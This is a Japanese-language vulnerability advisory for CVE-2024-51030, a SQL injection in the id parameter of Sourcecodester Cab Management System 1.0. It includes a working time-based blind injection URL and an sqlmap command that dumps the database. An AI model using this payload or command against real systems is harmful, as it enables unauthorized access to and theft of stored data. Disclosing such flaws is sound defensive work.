CVE-2024-51030
説明
Sourcecodester Cab Management System 1.0 の manage_client.php および view_cab.php における SQL インジェクションの脆弱性により、リモートの攻撃者が id パラメータを介して任意の SQL コマンドを実行でき、不正アクセスやデータベース内の機密データが侵害される可能性があります。
脆弱性の種類
SQL インジェクション
製品のベンダー
Sourcecodester
影響を受ける製品コードベース:
https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html - 1.0
影響を受けるコンポーネント:
Sourcecodester Cab Management System v1.0 は、manage_client.php および view_cab.php ページの id パラメータを介した SQL インジェクションに対して脆弱です。
攻撃ベクトル:
- アプリケーションをローカルにセットアップし、提供されているデフォルトの管理者認証情報を使用してログインするか、(staff) のような低権限の管理者ユーザーでログインすることもできます。
- 次に、ブラウザで次の URL に移動します: http://localhost/cms/admin/?page=clients/manage_client&id=1
- SQL ペイロードを注入する: URL の id パラメータを変更して、ブールベースのブラインドまたは時間ベースのブラインド SQL インジェクションペイロードを含めます:- http://localhost/cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%202085%20FROM%20(SELECT(SLEEP(5)))LxyK)--%20mvKJ
- アプリケーションの応答を観察する: インジェクションが成功した場合、ページの読み込みに著しく長い時間(5秒)がかかるはずです。これにより、id パラメータが SQL インジェクションに対して脆弱であることが確認できます。
- 次に、SQLMap ツールを使用してさらなる悪用とデータベースのダンプを行います。以下のコマンドを使用します: sqlmap -u "http://localhost/cms/admin/?page=clients/manage_client&id=1" -p id --dbms mysql --cookie="PHPSESSID=your_cookie" --risk 3 --level 4 --dbs --dump
参照:
- https://owasp.org/www-community/attacks/SQL_Injection
- https://portswigger.net/web-security/sql-injection